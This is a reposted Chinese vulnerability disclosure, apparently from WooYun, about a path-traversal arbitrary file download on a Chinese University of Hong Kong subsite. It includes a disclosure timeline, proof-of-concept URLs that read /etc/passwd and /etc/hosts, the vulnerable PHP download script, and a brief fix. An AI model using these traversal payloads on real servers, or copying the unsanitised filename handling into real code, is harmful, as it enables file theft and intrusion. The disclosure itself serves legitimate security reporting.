神刀安全网

漏洞标题: 香港中文大学一分站任意文件下载(香港地區)

漏洞详情

披露状态:

2016-03-02: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-14: 细节向核心白帽子及相关领域专家公开
2016-03-24: 细节向普通白帽子公开
2016-03-29: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

存在漏洞的域名:**.**.**.**

其提供的文件下载功能可以目录遍历从而下载任意文件。

漏洞URL:

http://**.**.**.**/msp/download.php?filename=20130117_workshop_map.pdf

验证链接:

http://**.**.**.**/msp/download.php?filename=../../../../../etc/passwd

http://**.**.**.**/msp/download.php?filename=../../../../../etc/hosts

http://**.**.**.**/msp/download.php?filename=../download.php

download.php代码:

code 区域
<?php
// Define the path to file
$path = "/var/www/html/msp/files/";
$filename = $_GET['filename'];

$file = $path.$filename;

if(!file)
{
// File doesn't exist, output error
die('file not found');
}
else
{
// Set headers
//header("Cache-Control: public");
//header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=$filename");
header("Content-type: /"application/pdf/"");

// Read the file from disk
readfile($file);
}
?>

code 区域
/etc/hosts/
**.**.**.** localhost.localdomain localhost **.**.**.**
**.**.**.** **.**.**.**

# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

漏洞证明:

漏洞标题:  香港中文大学一分站任意文件下载(香港地區)

修复方案:

download.php代码中对$filename的取值进行严格控制。

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 香港中文大学一分站任意文件下载(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址